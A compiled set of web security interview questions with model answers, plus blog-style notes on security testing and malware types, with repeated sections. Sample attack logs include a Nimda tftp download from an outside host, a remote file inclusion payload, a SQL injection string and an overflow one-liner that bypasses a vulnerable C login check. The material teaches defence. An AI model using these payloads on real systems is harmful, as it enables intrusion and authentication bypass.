Web Security Interview Questions

The goal of this document is to provide appropriate questions for

HR/Managers to pose to individuals who are applying for web security
related positions. These questions do not have right or wrong
answers, but rather spark relevant conversation between the applicant
and the hiring staff.

Entry Level Questions

1. What do you see as the most critical and current threats effecting
Internet accessible websites?

Goal of question – To gauge the applicant’s knowledge of current web

related threats. Topics such as Denial of Service, Brute Force, Buffer
Overflows, and Input Validation are all relevant topics. Hopefully they
will mention information provided by web security organizations such
as the Web Application Security Consortium (WASC) or the Open Web
Application Security Project (OWASP).

2. What online resources do you use to keep abreast of web security

issues? Can you give an example of a recent web security
vulnerability or threat?

Goal of question – Determine if the applicant utilizes computer security

resources such as CERT, SANS Internet Storm Center or ICAT. Email
lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good
resources. Recent examples of threats will vary depending on current
events, but issues such as new web based worms (PHP Santy Worm)
or applications, which are in wide use (awstats scripts) are acceptable.

3. What do you see as challenges to successfully deploying/monitoring

web intrusion detection?

Goal of question – We are attempting to see if the applicant has a wide

knowledge of web security monitoring and IDS issues such as:

• Limitations of NIDS for web monitoring (SSL, semantic issues

with understanding HTTP)
 • Proper logging – increasing the verboseness of logging
(Mod_Security audit_log)
• Remote Centralized Logging
• Alerting Mechanisms
• Updating Signatures/Policies

4. What is your definition of the term “Cross-Site Scripting”? What is

the potential impact to servers and clients?

Goal of question –This question will determine if the applicant is well

versed in the terminology used in web security. The applicant needs
to be able to articulate highly technological topics to a wide audience.
The second question will help to verify that the applicant fully
understands how XSS attacks work and the impact to client
information. WASC has a web security glossary of terms that may be
of help - http://www.webappsec.org/glossary.html

Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web

site to echo client-supplied data, which execute in a user’s web browser. When a
user is Cross-Site Scripted, the attacker will have access to all web browser
content (cookies, history, application version, etc). XSS attacks do not typically
directly target the web server or application, but are rather aimed at the client.
The web server is merely used as a conduit for the XSS data to be presented to
the end client. See also “Client-Side Scripting”.

5. What are the most important steps you would recommend for
securing a new web server? Web application?

Goal of question – Once again, there is no right or wrong answer,

however we are interested in what the applicant views as important.

Web Server Security:

• Update/Patch the web server software
• Minimize the server functionality – disable extra modules
• Delete default data/scripts
• Increase logging verboseness
• Update Permissions/Ownership of files

Web Application Security:

• Make sure Input Validation is enforced within the code -
Security QA testing
 • Configured to display generic error messages
• Implement a software security policy
• Remove or protect hidden files and directories

Advanced Level Questions

1. Imagine that we are running an Apache reverse proxy server and

one of the servers we are proxy for is a Windows IIS server. What
does the log entry suggest has happened? What would you do in
response to this entry?

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/

cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/
cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200
566 "-" "-"

Goal of question – To see if the applicant is fluent at reading web

server log files in the Common Log Format (CLF). In this scenario, the
client system (68.48.142.117) is infected with the Nimda worm.
These requests will not affect our Apache proxy server since this is a
Microsoft vulnerability. While it does not impact Apache, the logs do
indicate that the initial request was successful (status code of 200).
The Nimda worm will only send the level 2 request (trying to use
Trivial FTP to infect the target) if the initial request is successful.
Depending on the exact proxying rules in place, it would be a good
idea to inspect the internal IIS server to verify that it has not been
compromised.

If you were not using Apache as the reverse proxy, what Microsoft
application/tool could you use to mitigate this attack?

You could use either Microsoft's Internet and Security Acceleration

(ISA) server as a front-end proxy or implement URLScan on the target
IIS server. The urlscan.ini file has the AllowDotInPath directive which
will block directory traversal attempts.

2. You are engaged in a penetration-test where you are attempting to

gain access to a protected location. You are presented with this
login screen:
What are some examples of you how you would attempt to gain
access?

Goal of question – Determine if the applicant has a wide knowledge of

different authentication vulnerabilities. They may attempt default
usernames/passwords or attempt SQL Injection queries that provide
an SQL true statement (such as – ‘ OR 1=1#). If they provide SQL
examples, then offer them the following Error document information
and ask them what this indicates.

ODBC Error Code = 37000 (Syntax error or access violation)

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near '='.

Data Source = "ECommerceTheArchSupport2"

SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE
QuickJump_Items.ItemId <> 0 AND QuickJumpId ="

The error occurred while processing an element with a general identifier of (CFQUERY),
occupying document position (1:1) to (1:42) in the template file
K:\InetPub\clients\login\http\ailment.cfm

The specific sequence of files included or processed is:

K:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM

This error message indicates that the target web application if running
Microsoft SQL and discloses directory structures.

3. What application generated the log file entry below? What type of
attack is this? Assuming the index.php program is vulnerable, was
this attack successful?

========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at
POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a

Goal of question – to verify that the applicant can interpret various

web log files, identify attacks and possible impacts. The Mod_Security
Apache module generated this data in the audit_log file. The log entry
indicates that an attacker is attempting to exploit a PHP file inclusion
vulnerability in the index.php script. The commands being passed are
in the POST PAYLOAD of the command. This attack was not successful
for the following two reasons:

• The mod_security-message header indicates that Mod_Security

blocked this request based on a converted Snort web-attack rule
when it identified the “uname –a” data in the POST PAYLOAD.
• The attacker also made a typo in the OS commands being
passed in the POST PAYLOAD. She did not include a semicolon
“;” between the ls and uname commands. The target host
would fail to execute the “lsuname” command.

4. One of your web servers is logging multiple requests similar to the

following:

201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.htm HTTP/1.0” 403 769 “Microsoft

Data Access Internet Publishing Provider DAV 1.1” “-“

What does this log entry indicate? How could you identify what the
contents are of the “hacked.htm” file that the attacker is trying to
upload?

Goal of question – Determine if the applicant can identify both the

attack (a web defacement attempt using the HTTP PUT Method), as
well as, the logging limitations of CLF. In this type of attack, the
defacement text is sent in the request body and not on the URL
Request line. In order to identify this data, a network sniffing
application would need to be utilized. An application such as Snort
could be used with a custom rule to identify this activity. Here is an
example rule –

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"LOCAL Put

attempt"; flow:to_server,established; tag:session,50,packets; pcre:"/^PUT /A"; sid:3000001;
rev:1;)

5. You have been asked to review the source code for a compiled
script that is being used to validate logon credentials for a web
application. The file is called “logon_validate” and a typical logon
request looks like this –

“GET /cgi-bin/logon_validate?login=test&password=test”

The source code is shown below –

void show_error(void) {

// AUTHENTICATION ERROR

exit(-1);

int main(int argc, char **argv) {

char error_on_auth='1';
char user[128];
char pass[128];
char *ch_ptr_begin;
char *ch_ptr_end;

/**********************************/
/* Get Username from Query String */
/**********************************/
ch_ptr_begin=(char *)strstr(****QUERY_STRING****,"login=");
if (ch_ptr_begin==NULL)
show_error();
ch_ptr_begin+=6;
ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
if (ch_ptr_end==NULL)
show_error();
*(ch_ptr_end++)='\0';
strcpy(user,ch_ptr_begin);

/**********************************/
/* Get Password from Query String */
/**********************************/
ch_ptr_begin=(char *)strstr(ch_ptr_end,"password=");
if (ch_ptr_begin==NULL)
show_error();
ch_ptr_begin+=9;
 ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
if (ch_ptr_end!=NULL) *(ch_ptr_end++)='\0';
strcpy(pass,ch_ptr_begin);

if ((strcmp(user,GOOD_USER)==0) && (strcmp(pass,GOOD_PASS)==0))

error_on_auth='0';

if (error_on_auth=='0') {

// AUTHENTICATION OK!!

} else {

// AUTHENTICATION ERROR
show_error();

// return(0); hehe could be evil ;PPPPP

exit(0);

This pseudo-code is taken from the NGSec Web Auth Games

http://quiz.ngsec.biz:8080/game1/level6/replicant.php

Do you see any problems with this script? How could an attacker
exploit this script to bypass the authentication mechanisms in this
script? What are some mitigation options?

Goal of question – This is most likely the most complex question being
asked during the interview due to the fact that the applicant will need
to apply multiple layers of analysis, including both the attacker and
defender perspectives.

Reference “Smashing The Stack For Fun And Profit” for technical
details –
http://www.phrack.org/phrack/49/P49-14

The security issue with this script has to do with a buffer overflow
problem in the way that the script is using the “error_on_auth”
condition. The error_on_auth condition is initially declared to be “1”
which means that he user is not authenticated. The “user” condition
was declared directly after the error_on_auth and has been allocated
128 bytes. Due to the ordering of the declaration of the
error_on_auth and user parameters, they occupy adjacent locations on
the running stack. The result is that if the attacker submits a
username that is 129 bytes (with the last byte being “0”), they can
overwrite the error_on_auth data. A Unix command such as the
following would achieve this goal –

http://www.companyx.com/cgi-bin/validate_logon?logon=000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000

or

# wget http://www.companyx.com/cgi-bin/validate_logon?logon=`perl -e print "0"x129`

Mitigation options include the following:

• Update the validate_logon soruce code to fix the problem, such
as using strncpy() instead of strcpy ().
• If the source code could not be updated, then security filters
would need to be implemented on the web server.
• Using Mod_Security, you could implement some security filters
for the “validate_logon” URL such as these:
o Only allow letters in the username argument. This would
prevent the client from overwriting the error_on_auth data
with a zero.

<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN “!^[a-zA-Z]”
</Location>

o You could also add another rule to restrict the size of the
username/password arguments to be less then 129
characters.

<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN “!^[a-zA-Z]”
SecFilterSelective ARG_LOGIN|ARG_PASSWORD “.{129,}”
</Location>

A web application firewall (WAF) device could be implemented on the network to

protect the entire web site. These devices have positive policy capability that
should identify these types of attacks as "anomalous" and deny them. A brief
listing of WAF vendors include Teros, Netcontiuum, Imperva, Watchfire, Breach,
Axiliance, and others.
1 Security Testing approach for Web
Applications
2 What is Security Testing?
Security testing is one of the most important types of software testing that
intended to find the vulnerabilities or weakness of the software application. The
main objective of security testing is to find the vulnerabilities of system &
determine that its data and resources are protected from possible intruder.
Security testing allows us to identify the

confidential data stays confidential or not.

Now a day’s online transaction are rapidly increasing, so security testing on web
application is one of the most important thing to be carried out while testing web
applications. The security testing is to be carried out once the system is developed &
installed. To identify the vulnerabilities the network security testing should be performed
periodically.

There are “Seven attributes of Security Testing” as follows, for more details
check here:

• Authentication
• Authorization
• Confidentiality
• Availability
• Integrity
• Non-repudiation
• Resilience

In the pie-chart below, created by the Web Hacking Incident Database for 2011
(WHID) clearly shows that whilst many different attack methods exist, SQL
injection and XSS are the most popular.
Image Credit: @acunetix.com
23 6 basics terms used in Security Testing
Here are the useful terms frequently used in severity testing:

1.1 1) What is “Penetration Testing”?

Penetration testing is a type of security testing process to identify security

vulnerabilities in an application by evaluating the system or network with various
malicious techniques. The main purpose of this testing is to protect the identified
vulnerabilities & secure the important data from unknown user who do not have
the access to the system like hackers. The penetration testing can be carried out
after the cautious consideration, notification, and planning.

There are two types of penetration testing, White box testing & Black box testing.
In White box testing is all information is with tester prior start testing like IP
Address, Code & Infrastructure diagram & based on available information tester
will perform the testing. In Black box testing, tester do not has any information of
system under test. This is more accurate testing method as we are simulating the
testing with real hackers which they do not having the information of existing
system.

1.2 2) Password cracking:

In security testing of a web application Password cracking programs can be used

to identify weak passwords. It can be start using guessing the common
username and password or use of password cracking tool. Password cracking
confirms that users are making use of adequately strong passwords.
In the system password are generally stored in the encrypted format like hash, so
once the use try to login using login credentials then hash is created for newly
entered password & compared with the original stored hash, once the stored
hash matches then user is authenticated. Automated Password cracking is
basically generates the random hashes unless and until match is not found. The
most commonly used password cracking is the use of Dictionary attack. In this
case automated tool is try all words from dictionary.

It would be easier if the password does not asking for complex passwords like
password must having at least one digit one character and one special
characters etc. Sometimes the passwords are stored on cookies, if such login
credentials information stored without encryption in cookies then hacker can use
different methods to get the username & password information.

1.3 3) What is “Vulnerability”?

The Vulnerability is a weakness in a system under test which may cause the
malicious attaches by unauthorized users. The vulnerability can be increase due
to bugs in the software, lacking of Security testing or viruses etc. These security
vulnerabilities require patches, or fixes, in order to prevent the potential for
compromised integrity by hackers or malware.

1.4 4) What is “URL manipulation”?

URL Manipulation is very much interesting and most common type of attack by
hackers. In this attack the hackers manipulate the website URL query strings &
capture the important information.

This happens when the application uses the HTTP GET method to pass
information between the client and the server. The information is passed in
parameters in the query string. The tester can modify a parameter value in the
query string to check if the server accepts it.

Via HTTP GET request user information is passed to server for authentication or
fetching data. Attacker can manipulate every input variable passed from this GET
request to server in order to get the required information or to corrupt the data. In
such conditions any unusual behavior by application or web server is the
doorway for the attacker to get into the application.

So while security testing the URL manipulation test cases should be considered
to make sure that using URL manipulation unauthorized user is not able to
access the important information or not corrupting the database records.
1.5 5) What is “SQL injection”?

SQL Injection is one of the most common application layer attack techniques
used by hackers. SQL Injection is one of the several web attack mechanisms
used by hackers to steal data from organizations. SQL injection attacks are very
critical as attacker can get vital information from server database. It is a type of
attack which takes the advantage of loop holes present in implementation of web
application that allows hacker to hack the system like passing sql queries into all
input fields and tries to hack the system.

Hackers try to query database with SQL injection statements or part of SQL
statement as user input & pull out the vital information from system or crash the
system & from the error displayed on browser can get the required information
what they are looking for.

To check the sql injection we have to take care of the input fields like text boxes,
comments etc. The Special characters should be either properly handled or
skipped from the input.

1.6 6) Cross Site Scripting (XSS)

Cross-site scripting (also known as XSS or CSS) is a type of computer security

vulnerability typically found in web applications. Cross Site Scripting is one of the
most common application layer hacking techniques. Cross Site Scripting is
vulnerability in web application that allows an attacker to inject HTML and
JAVASCRIPT code into a web page. This type of attacks are injecting malicious
scripts into victim’ web browsers. These malicious scripts are used to steal the
vital information stored in the cookies.
34 Types of testing to perform while Security
Testing
Let’s discuss what all steps to prepare while preparing and planning for Security
testing:

• The first step is to understand the business requirement, security goals and
objective in terms of security compliance of the organization. The test planning
should consider all security factors like Organization might have planned to
achieve PCI compliance etc.
• Understand and analyze the requirements of the application under test.
• Collect all system setup information used for development of Software and
Network like Operating Systems, technology, hardware.
• Make out the list of Vulnerabilities and Security Risks.
• Based on above step prepare Threat profile.
• Based on identified Threat, Vulnerabilities and Security Risks prepare test plan to
address these issues.
• For each identified Threat, Vulnerabilities and Security Risks prepare Traceability
Matrix.
• All security testing cannot possible to execute manually, so identify the tool to
execute the all security test cases faster & more reliable.
• Prepare the Security tests case document.
• Perform the Security Test cases execution and retest the defect fixes.
• Execute the Regression Test cases.
• Prepare detailed report of Security Testing which contains Vulnerabilities and
Threats contained, detailing risks, and still open issues etc.
45 Seven attributes of Security Testing
Security testing is to be carried out to make sure that whether the system
prevents the unauthorized user to access the resource and data. In web
applications & client server application the Security testing plays an important
role. In the previous article we have learn about the Security Testing and in
today’s article we are concentrating on the “Seven attributes of the security
testing”.

Security Testing needs to cover the seven attributes of Security Testing:

Authentication, Authorization, Confidentiality, Availability, Integrity, Non-
repudiation and Resilience. So let’s discuss one by one below:

1.7 1) Authentication :

Authentication is a process of identifying the person before accessing the

system. It allows user to access the system information only if authentication
check got passed. Apart from Username & password combination, the
authentication can be implemented in different ways like asking secret question
and answer, OTP (One Time Password) over SMS, biometric authentication,
Token based authentication like RSA Secure ID token etc. It is also possible to
use combinations of above options for authentication.

1.8 2) Authorization :

Once the Authentication passed the Authorization comes in the picture to limit
the user as per the permission set for the user. The Authorization is generally
implemented on Access control list, user role based, user group based and
define the permissions & restrictions to specific user group or granting or
revoking the privileges for the users.
1.9 3) Confidentiality:

Confidentiality is to be carried out to check if unauthorized user and less

privileged users are not able to access the information. It is to check that the
protection of information and resources from the users other than the authorized
and authenticated. The confidentiality of information is carried out at all stages
like processing, storage and displays the information. It is checked that the
information stored in the database in the encrypted format & not stored in the
plain format. Also check if while accessing the information by administrator or
developer all information should be displayed in encrypted format or not.

1.10 4) Availability:

The availability of system is to check the system is available for authorized users
whenever they want to use except for the maintenance window & upgrade for
security patches. Downtime of the system should be minimum but the downtime
can be due to natural disasters or hardware failure. Most of the time backup
failover site is parallel running with main site. Once the main site down due to
some reason then the all requests to main site are redirected to backup site. One
more example of availability is the mirroring of the databases. In this concept
there are two databases one is main primary database other is secondary
(mirroring) database. Once the new record is added or updated or deleted from
system then this action is taken in the main primary database, once any action is
taken in this primary database then the updated data gets reflected on secondary
database. In this way both Primary & secondary databases are mirrored to each
other. Once the failure of Primary database is observed then the secondary
database comes in the picture and reduces the downtime & increase the
availability of the system.

1.11 5) Integrity:

Integrity is to make sure that the information received is not altered during the
transit & check if correct information presented to user is as per the user groups,
privileges & restrictions.

1.12 6) Non-repudiation:

Tracking who is accessing the systems and which of the requests were denied
along with additional details like the Timestamp and the IP address from where
the requests came from. Means confirmation sent by receiver to sender that the
requested services or information was successfully received as Digital
confirmation e.g. Digital Certificates, this not only serves as acknowledgement
but also helps to validate both sender and receiver is genuine.

1.13 7) Resilience:

Resilience is to check the system is resistance to bear the attacks, this can be
implemented using encryption, use OTP (One Time Password), two layer
authentication or RSA key token.

I think I have addressed all major attributes of the Security testing. If I missed
out addressing some important point in Security testing then let me know in
comments below. I will keep on updating the article for latest testing information.

If you enjoy reading this article please make sure to share it with your friends.
Please leave your questions/tips/suggestions in the comment section below and
I’ll try to answer as many as I can.

1.13.1 Security/Penetration Testing Interview Questions

• What type of security testing you performed?
• What types of web testing security problems do you know?
• Please classify vulnerabilities that you know.
• What are two common techniques used to protect a password file?
• What is integer overflow?
• What is your understanding of root causes of vulnerabilities?
• What is ISO 17799?
• Can you describe security defect prevention?
• List and briefly define three classes of intruders.
• What are three benefits that can be provided by an intrusion detection
system?
• What services are provided by the SSL Record Protocol?
• Why do we need validate users input for length and characters?
• Why we need to keep track of individual users and authentication?
• What is runtime inspection?
• Describe with examples Fuzzers and Sniffers tools:
• Define buffer overflows.
• What are format string vulnerabilities?
• What is SQL injection?
• Provide example of command injection.
• Provide example of broken access control.
• List and briefly define the parameters that define an SSL session state.
• List and briefly define the parameters that define an SSL session connection.
• Why do we need port scanning?
• How to use an interactive proxy and a set of fuzz strings to manually test the
application’s handling of data?
• What is cookie gathering?
• What is a honeypot?
• What is phishing attack?
• What is a dual signature and what is its purpose?
• How can you ensure that all input fields are properly validated to prevent code
injection attacks?
• What tools can you use to validate the strength of SID (session ID)?
• What is file enumeration?
• What steps are involved in the SSL Record Protocol transmission?
• What are hidden fields in HTTP?
• What protocols comprise SSL?
• How to implement (create) a custom fuzz utility and test it against your
application?
• Describe SOAP and WSDL.
• List and briefly define the principal categories of SET participants.
• How to test a scriptable ActiveX object?
• What is the difference between statistical anomaly detection and rule-based
intrusion detection?
• What metrics are useful for profile-based intrusion detection?
• What is the difference between rule-based anomaly detection and rule-based
penetration identification?
• What is a salt in the context of UNIX password management?
• List and briefly define four techniques used to avoid guessable passwords.
• What is the difference between an SSL connection and an SSL session?
• List and briefly define Acronyms and Abbreviations Related to Software
security
• Write an example of misusing strcpy() in C and C++ in such a way that a buffer
overflow condition exists as a bug
• Why we use firewall for security when we have facilities like access-list on
routers ?
• What are the most important steps you would recommend for securing a new
web server? Web application?
• You have been asked to review the source code for a compiled script that is
being used to validate logon credentials for a web application. The file is
called "logon_validate" and a typical logon request looks like this -
• If you were not using Apache as the reverse proxy, what Microsoft
application/tool could you use to mitigate this attack?
• What do you see as challenges to successfully deploying/monitoring web
intrusion detection?
• What online resources do you use to keep abreast of web security issues?
Can you give an example of a recent web security vulnerability or threat?
• What does this log entry indicate? How could you identify what the contents
are of the "hacked.htm" file that the attacker is trying to upload?
• What are some examples of you how you would attempt to gain access?
• What application generated the log file entry below? What type of attack is
this? Assuming the index.php program is vulnerable, was this attack
successful?
• One of your web servers is logging multiple requests similar to the following:
• What is your definition of the term "Cross-Site Scripting"? What is the potential
impact to servers and clients?
• What do you see as the most critical and current threats effecting Internet
accessible websites?
• What is a firewall?
• Describe how to manage a firewall
• What is a Denial of Service attack?
• What is a “spoofed” packet?
• What is a SYN Flood?
• What do you do if you are a victim of a DoS?
• What is GPG/PGP?
• What is SSH?
• What is SSL? How do you create certificates?
• What would you do if you discovered a UNIX or Network device on your
network has been compromised?
• What would you do if you discovered a Windows system on your
network has been comrpromised?
• What is DNS Hijacking?
• What is a log host?
• What is IDS or IDP, and can you give me an example of one?
• Why are proxy servers useful?
• What is web-caching?

• What are the most important steps you would

recommend for securing a new web server?
The following are the most important steps for securing a new web server:
1. Update/patch the web server software
 2. Ensure that the server functionality is minimized and disable the extra modules
3. Always remove the fault scripts / data
4. Increase the verboseness of logging
5. Update the ownership / permissions of the files.

1.13.2 What are the most important steps you would recommend for securing a
new web server?

• Minimize rights.
• Update permissions.
• Delete default data and scripts.
• Make use of software firewall.
• Enable and make use of IIS logging.
• Regular backup.
• Updating the windows tool installed.

1.13.3 Web Application Penetration Testing

A web application or webapp is an application that is

accessed via web browser over a network such as
the Internet or an intranet. It is also a computer
software application that is coded in a browser-
supported language (such as HTML, JavaScript, Java,
etc.) and reliant on a common web browser to
render the application executable
Analysis shows that
• 1% of the bugs (programming errors) cause
50% of security problems
• If configured right, information systems can
survive almost all attacks
Application security deals with checking the
vulnerabilities in application and to ensure there is
secure methods followed to remove these security
flaws at all stages of SDLC.

What are the threats?

• denial-of-service
• unauthorized use or misuse of computing systems
• loss/alteration/compromise of data or software
• monetary/financial loss
• loss or endangerment of human life
• loss of trust in computer/network system
• loss of public confidence

Who are the threats?

• Competitors
• Hackers
• Corporate Spies
• Disgruntled Employees
• Careless Employees
• Professional Thieves
• Visitors

Security Testing:
In order to find vulnerabilities in web applications we need
to identify them:
Methods:
Code audit (a lot of work) also refers to White Box Testing
Testing (manual or automated) also refers to Black Box Testing
Manual testing: a human being attacks a web application using his experience,
knowledge and tools
Automated testing: a human being uses an automated vulnerability scanner to attack a
web application
Security Testing helps to understand the extent to which a system/application can protect
itself from unauthorized access, hacking, cracking, any code damage, etc.
•Verify and validate that applications meet the security requirements
•Identify security vulnerabilities of applications in the given environment
This type of testing needs sophisticated testing techniques

Posted by atlurianupama at 02:09 1 comment:

Email ThisBlogThis!Share to TwitterShare to FacebookShare to Pinterest

1.13.4 Virus,Trojan,Worm
Virus: A computer virus is a small program written to alter the way a computer operates,
without the permission or knowledge of the user. A virus must meet two criteria:
It must execute itself. It often places its own code in the path of execution of another
program.

• It must replicate itself. For example, it may replace other executable files with a
copy of the virus infected file. Viruses can infect desktop computers and network
servers alike.

Some viruses are programmed to damage the computer by damaging programs, deleting
files, or reformatting the hard disk. Others are not designed to do any damage, but simply
to replicate themselves and make their presence known by presenting text, video, and
audio messages. Even these benign viruses can create problems for the computer user.
They typically take up computer memory used by legitimate programs. As a result, they
often cause erratic behavior and can result in system crashes. In addition, many viruses
are bug-ridden, and these bugs may lead to system crashes and data loss

Five recognized types of viruses:

File infector viruses:File infector viruses infect program files. These viruses normally infect executable code, such as
.com and .exe files. The can infect other files when an infected program is run from floppy, hard drive, or from the
network. Many of these viruses are memory resident. After memory becomes infected, any noninfected executable that
runs becomes infected. Examples of known file infector viruses include Jerusalem and Cascade.

Boot sector viruses:Boot sector viruses infect the system area of a disk; that is, the boot record on floppy disks and
hard disks. All floppy disks and hard disks (including disks containing only data) contain a small program in the boot
record that is run when the computer starts up. Boot sector viruses attach themselves to this part of the disk and activate
when the user attempts to start up from the infected disk. These viruses are always memory resident in nature. Most
were written for DOS, but, all PCs, regardless of the operating system, are potential targets of this type of virus. All that
is required to become infected is to attempt to start up your computer with an infected floppy disk Thereafter, while the
virus remains in memory, all floppy disks that are not write protected will become infected when the floppy disk is
accessed. Examples of boot sector viruses are Form, Disk Killer, Michelangelo, and Stoned.

Master boot record viruses:Master boot record viruses are memory-resident viruses that infect disks in the same
manner as boot sector viruses. The difference between these two virus types is where the viral code is located. Master
boot record infectors normally save a legitimate copy of the master boot record in an different location. Windows NT
computers that become infected by either boot sector viruses or master boot sector viruses will not boot. This is due to
the difference in how the operating system accesses its boot information, as compared to Windows 98/Me. If your
Windows NT systems is formatted with FAT partitions you can usually remove the virus by booting to DOS and using
antivirus software. If the boot partition is NTFS, the system must be recovered by using the three Windows NT Setup
disks. Examples of master boot record infectors are NYB, AntiExe, and Unashamed.

Multipartite viruses:Multipartite (also known as polypartite) viruses infect both boot records and program files. These
are particularly difficult to repair. If the boot area is cleaned, but the files are not, the boot area will be reinfected. The
same holds true for cleaning infected files. If the virus is not removed from the boot area, any files that you have
cleaned will be reinfected. Examples of multipartite viruses include One_Half, Emperor, Anthrax and Tequilla.

Macro viruses:These types of viruses infect data files. They are the most common and have cost corporations the most
money and time trying to repair. With the advent of Visual Basic in Microsoft's Office 97, a macro virus can be written
that not only infects data files, but also can infect other files as well. Macro viruses infect Microsoft Office Word,
Excel, PowerPoint and Access files. Newer strains are now turning up in other programs as well. All of these viruses
use another program's internal programming language, which was created to allow users to automate certain tasks
within that program. Because of the ease with which these viruses can be created, there are now thousands of them in
circulation. Examples of macro viruses include W97M.Melissa, WM.NiceDay and W97M.Groov.

Trojan horses: These are impostors—files that claim to be something desirable but, in
fact, are malicious. A very important distinction between Trojan horse programs and true
viruses is that they do not replicate themselves. Trojan horses contain malicious code that
when triggered cause loss, or even theft, of data. For a Trojan horse to spread, you must
invite these programs onto your computers; for example, by opening an email attachment
or downloading and running a file from the Internet. Trojan.Vundo is a Trojan horse.

Worm: Worms are programs that replicate themselves from system to system without
the use of a host file. This is in contrast to viruses, which requires the spreading of an
infected host file. Although worms generally exist inside of other files, often Word or
Excel documents, there is a difference between how worms and viruses use the host file.
Usually the worm will release a document that already has the "worm" macro inside the
document. The entire document will travel from computer to computer, so the entire
document should be considered the worm W32.Mydoom.AX@mm is an example of a
worm
Posted by atlurianupama at 02:01 No comments:
Email ThisBlogThis!Share to TwitterShare to FacebookShare to Pinterest

1.13.5 Security/Penetration Testing Interview Questions

• What type of security testing you performed?
• What types of web testing security problems do you know?
• Please classify vulnerabilities that you know.
• What are two common techniques used to protect a password file?
• What is integer overflow?
• What is your understanding of root causes of vulnerabilities?
• What is ISO 17799?
• Can you describe security defect prevention?
• List and briefly define three classes of intruders.
• What are three benefits that can be provided by an intrusion detection
system?
• What services are provided by the SSL Record Protocol?
• Why do we need validate users input for length and characters?
• Why we need to keep track of individual users and authentication?
• What is runtime inspection?
• Describe with examples Fuzzers and Sniffers tools:
• Define buffer overflows.
• What are format string vulnerabilities?
• What is SQL injection?
• Provide example of command injection.
• Provide example of broken access control.
• List and briefly define the parameters that define an SSL session state.
• List and briefly define the parameters that define an SSL session connection.
• Why do we need port scanning?
• How to use an interactive proxy and a set of fuzz strings to manually test the
application’s handling of data?
• What is cookie gathering?
• What is a honeypot?
• What is phishing attack?
• What is a dual signature and what is its purpose?
• How can you ensure that all input fields are properly validated to prevent code
injection attacks?
• What tools can you use to validate the strength of SID (session ID)?
• What is file enumeration?
• What steps are involved in the SSL Record Protocol transmission?
• What are hidden fields in HTTP?
• What protocols comprise SSL?
• How to implement (create) a custom fuzz utility and test it against your
application?
• Describe SOAP and WSDL.
• List and briefly define the principal categories of SET participants.
• How to test a scriptable ActiveX object?
• What is the difference between statistical anomaly detection and rule-based
intrusion detection?
• What metrics are useful for profile-based intrusion detection?
• What is the difference between rule-based anomaly detection and rule-based
penetration identification?
• What is a salt in the context of UNIX password management?
• List and briefly define four techniques used to avoid guessable passwords.
• What is the difference between an SSL connection and an SSL session?
• List and briefly define Acronyms and Abbreviations Related to Software
security
• Write an example of misusing strcpy() in C and C++ in such a way that a buffer
overflow condition exists as a bug
• Why we use firewall for security when we have facilities like access-list on
routers ?
• What are the most important steps you would recommend for securing a new
web server? Web application?
• You have been asked to review the source code for a compiled script that is
being used to validate logon credentials for a web application. The file is
called "logon_validate" and a typical logon request looks like this -
• If you were not using Apache as the reverse proxy, what Microsoft
application/tool could you use to mitigate this attack?
• What do you see as challenges to successfully deploying/monitoring web
intrusion detection?
• What online resources do you use to keep abreast of web security issues?
Can you give an example of a recent web security vulnerability or threat?
• What does this log entry indicate? How could you identify what the contents
are of the "hacked.htm" file that the attacker is trying to upload?
• What are some examples of you how you would attempt to gain access?
• What application generated the log file entry below? What type of attack is
this? Assuming the index.php program is vulnerable, was this attack
successful?
• One of your web servers is logging multiple requests similar to the following:
• What is your definition of the term "Cross-Site Scripting"? What is the potential
impact to servers and clients?
• What do you see as the most critical and current threats effecting Internet
accessible websites?
• What is a firewall?
• Describe how to manage a firewall
• What is a Denial of Service attack?
• What is a “spoofed” packet?
• What is a SYN Flood?
• What do you do if you are a victim of a DoS?
 • What is GPG/PGP?
• What is SSH?
• What is SSL? How do you create certificates?
• What would you do if you discovered a UNIX or Network device on your
network has been compromised?
• What would you do if you discovered a Windows system on your
network has been comrpromised?
• What is DNS Hijacking?
• What is a log host?
• What is IDS or IDP, and can you give me an example of one?
• Why are proxy servers useful?
• What is web-caching?

• What are the most important steps you would

recommend for securing a new web server?
The following are the most important steps for securing a new web server:
1. Update/patch the web server software
2. Ensure that the server functionality is minimized and disable the extra modules
3. Always remove the fault scripts / data
4. Increase the verboseness of logging
5. Update the ownership / permissions of the files.

1.13.6 What are the most important steps you would recommend for securing a
new web server?

• Minimize rights.
• Update permissions.
• Delete default data and scripts.
• Make use of software firewall.
• Enable and make use of IIS logging.
• Regular backup.
